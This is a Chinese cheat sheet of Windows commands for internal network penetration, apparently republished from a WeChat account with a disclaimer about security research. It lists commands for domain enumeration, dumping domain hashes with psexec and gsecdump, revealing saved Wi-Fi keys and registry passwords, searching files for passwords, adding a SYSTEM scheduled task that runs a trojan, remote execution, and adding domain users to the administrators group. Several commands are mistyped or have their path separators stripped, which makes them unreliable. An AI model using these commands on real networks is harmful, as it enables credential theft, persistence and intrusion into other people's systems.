![【奇技淫巧】内网渗透命令大全 【奇技淫巧】内网渗透命令大全]()
1.域常用操作命令: |
net group /domain |
//获得所有域用户组列表 |
net group qq_group /domain |
//显示域中qq_group组的成员 |
net group qq_group /del /domain |
//删除域中qq_group组 |
net group qq_group qq /del /domain |
//删除域内qq_group 群组中的成员QQ |
net group qq_group /add /domain |
//增加域中的群组 |
net group "domain admins" /domain |
//获得域管理员列表 |
net group "enterprise admins" /domain |
//获得企业管理员列表 |
net localgroup administrators /domain |
//获取域内置administrators组用(enterprise admins、domain admins) |
net group "domain controllers" /domain |
//获得域控制器列表 |
net group "domain computers" /domain |
//获得所有域成员计算机列表 |
net user /domain |
//获得所有域用户列表 |
net user someuser /domain |
//获得指定账户someuser的详细信息 |
net accounts /domain |
//获得域密码策略设置,密码长短,错误锁定等信息 |
nei view /domain |
//查询有几个域, 查询域列表 |
net view /domain:testdomain |
//查看 testdomain域中的计算机列表 |
nltest /domain_trusts |
//获取域信任信息 |
net user domain-admin /domain |
//查看管理员登陆时间,密码过期时间,是否有登陆脚本,组分配等信息 |
net config Workstation |
//查询机器属于哪个域 |
net time /domian |
//查询主域服务器的时间 |
echo %logonserver% |
//查看登陆到这台服务器的计算机名 |
net time \192.168.1.1 |
//查询远程共享主机192.168.1.1的时间 |
net use \IPipc$ password /user:username@domain |
//ipc$域内连接 |
net view \dc2.backlion.com |
//查看域控共享情况 |
dir \dc2.backlion.comSYSVOL /s /a > sysvol.txt |
//列出sysvol日志记录 |
xcopy \dc2.backlion.comsysvol.txt sysvol.txt /i /e /c |
//远程拷贝到本地sysvol日志 |
net user /domain bk bk123 |
//修改域内用户密码,需要管理员权限 |
net localgroup administartors SEZKLbacklion /add |
//将SEZKL域中的用户backlion添加到administrators组中 |
mstsc /admin |
//远程桌面登录到console会话解决hash无法抓出问题 |
gpupdate/force |
//更新域策略 |
psexec \192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u |
//从域服务器密码存储文件windows/ntds/ntds.dit导出hash值出来 |
gsecdump -a |
//获取域登管理员登录过得hash值,这里gescdump为第三方导出AD域的hash值 |
tasklist /S ip /U domainusername /P /V |
//查看远程计算机进程列 |
2.基本内网渗透命令: |
ipconfig/all |
//查看IP地址 |
ipconfig /release |
//释放地址 |
ipconfig /renew |
重新获取Ip地址 |
whoami |
//查询账号所属权限 |
whoami/all |
//查看sid值 |
systeminfo |
//查询系统以及补丁信息 |
tasklist /svc |
//查看进程 |
taskkill /im 进程名称(cmd) |
//结束进程 |
taskkill /pid[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程) |
wmic qfe get hotfixid |
//查看已安装过得补丁,这个很实用 |
wmic qfe list full /format:htable > hotfixes.htm |
//详细的补丁安装 |
wmic qfe |
//查询补丁信息以及微软提供的下载地址 |
ping hostname(主机名) |
//显示该机器名的IP |
net start |
//查看当前运行的服务 |
net user |
//查看本地组的用户 |
net localhroup administrators |
//查看本机管理员组有哪些用户 |
net user |
//查看会话 |
net session |
//查看当前会话 |
net share |
//查看SMB指向的路径[即共享] |
wmic share get name,path |
//查看SMB指向的路径 |
wmic nteventlog get path,filename,writeable |
//查询系统日志文件存储位置 |
net use \IPipc$ password /user:username |
//建立IPC会话(工作组模式) |
net use z: \192.168.1.1 |
//建立映射到本机Z盘 |
net time \172.16.16.2 |
//查询共享主机的是 |
at \172.16.16.2 13:50 c:windows2009.exe |
//在共享主机上执行 |
netstat -ano |
//查看开放的端口 |
netstat -an | find “3389” |
//找到3389端口 |
net accounts |
//查看本地密码策略 |
nbtstat –A ip |
//netbiso查询 |
net view |
//查看机器注释或许能得到当前活动状态的机器列表,如果 禁用netbios就查看不出来 |
echo %PROCESSOR_ARCHITECTURE% |
//查看系统是32还是64位 |
set |
//查看系统环境设置变量 |
net start |
//查看当前运行的服务 |
wmic service list brief |
//查看进程服务 |
wmic process list brief |
//查看进程 |
wmic startup list brief |
//查看启动程序信息 |
wmic product list brief |
//查看安装程序和版本信息(漏洞利用线索) |
wmic startup list full |
//识别开机启动的程序 |
wmic process where(description="mysqld.exe") >>mysql.log |
//获取软件安装路径 |
for /f "skip=9 tokens=1,2 delims=:" %i in ('ne tsh wlan showprofiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %jkey=clear |
//一键获取wifi密码 |
if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell) |
//查看是否支持posershell |
qwinsta |
//查看登录情况 |
schtasks.exe /Create /RU"SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "c:/muma.ex e" /ED 2017/4/7 |
//添加计划任务 |
set KB2829361=MS13-046&set KB2830290=MS13-046&setKB2667440=MS12-020&set KB2667402=MS12-020&set KB3124280=MS16-016&setKB3077657=MS15-077&set KB3045171=MS15-051&setKB2592799=MS11-080&set KB952004=MS09-012 PR&set KB956572=MS09-012 巴西烤肉&set KB970483=MS09-020 iis6&set KB2124261=MS10-065 ii7&setKB2271195=MS10-065 ii7&systeminfo>a.txt&(for %i in (KB952004 KB956572KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165KB958644 KB2667402 KB2667440 KB2830290 KB2829361 KB3045171 KB3077657 KB3124280)do @type a.txt|@find /i "%i"||@echo %%i% Not Installed!)&del /f/q /a a.txt |
//windows未打补丁情况 |
REG query HKCU /v "pwd" /s |
//获取保存到注册表中的密码 |
3.内网网络结常用命令: |
tracert IP |
//路由跟踪 |
route print |
//打印路由表 |
arp -a |
//列出本网段内所有活跃的IP地址 |
arp -s (ip + mac) |
//绑定mac与ip地址 |
arp -d (ip + mac) |
//解绑mac与ip地址 |
nbtscan -r 192.168.16.0/24 |
//通过小工具nbtscan扫描整个网络 |
netsh firewall show config |
//查看防火墙策略 |
netsh firewall show state |
//查看防火墙策略 |
for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i"ttl" |
//批量扫描内网存活主机 |
windows自带端口转发: |
netsh interface ipv6 install |
//首先安装IPV6(xp、2003下IPV6必须安装,否则端口转发不可用!) |
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=22connectaddress=1.1.1.1 connectport=22 |
//将本机22到1.1.1.1的22 |
netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=8.8.8.8 connectport=22 |
|
netsh interface portproxy add v4tov4 listenaddress=192.168.193.1listenport=22 connectaddress=www.baidu.com connectport=22 |
|
netsh interface portproxy show all |
// 查看转发配置 |
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0listenport=22 |
//删除配置 |
netsh firewall set portopening protocol=tcp port=22 name=Forwardmode=enable scope=all profile=all |
//添加防火墙规则,允许连接22: |
4.敏感数据和目录: |
dir /b/s config.* |
//查看所在目录所有config.为前缀的文件 |
findstr /si password *.xml *.ini *.txt |
//查看后缀名文件中含有password关键字的文件 |
findstr /si login *.xml *.ini *.txt |
//查看后缀名文件中含有login关键字的文件 |
copy con 创建命令: |
|
copy con ftp.bat |
//创建ftp.bat批处理,然后输入ifconfig等命令,按ctr+z退出,并创建成功 |
copy con test.vbs |
//创建test.vbs脚本,输入脚本后,按ctr+z退出,并创建成功 |
5.dsquery的AD查询工具: |
dsquery user domainroot -limit 65535 && net user /domain |
//列出该域内所有用户名 |
dsquery server -domain super.com | dsget server -dnsname -site |
//搜索域内所有域控制器并显示他们的DNS主机名和站点名称 |
dsquery contact |
//寻找目录中的联系人 |
dsquery subnet |
//列出该域内网段划分 |
query user |
//查询那些用户在线 |
dsquery group && net group /domain |
//列出该域内分组 |
dsquery ou |
//列出该域内组织单位 |
dsquery server && net time /domain |
//列出该域内域控制器 |
dsquery site -o rdn |
//搜索域中所有站点的名称 |
dsquery group dc=super,dc=com |more |
//搜索在DC=SUPER,DC=COM 域中的所有组 |
psloggedon.exe |
//查询那台主机和用户登录到该主机上 |
netsess.exe //192.168.1.115 |
//远程主机上无需管理员权限,查询到主机名和用户 |
reg query "HKEY_CURRENT_USERSOFTWAREMICROSOFTTERMINAL SERVERCLIENTDEFAULT" |
//获取最近mstsc登录的记录 |
6.DOS常用快捷命令 |
mspaint |
画图工具 |
calc |
计算器 |
notepad |
记事本 |
taskmgr |
任务管理器 |
osk |
打开屏幕键盘 |
gpedit.msc |
组策略 |
services.msc |
本地服务 |
compmgmt.msc |
计算机管理 |
devmgmt.msc |
设备管理器 |
winver |
查看系统版本 |
magnify |
放大镜实用程序 |
eventvwr |
事件查看器 |
Regedit |
打开注册表 |
resmon |
资源监视器 |
WMIC BIOS get releasedate |
查看电脑生产日期 |
mstsc -f |
远程连接(可以全屏) |
![【奇技淫巧】内网渗透命令大全 【奇技淫巧】内网渗透命令大全]()
本文始发于微信公众号(T00ls):【奇技淫巧】内网渗透命令大全
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
https://cn-sec.com/archives/350778.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论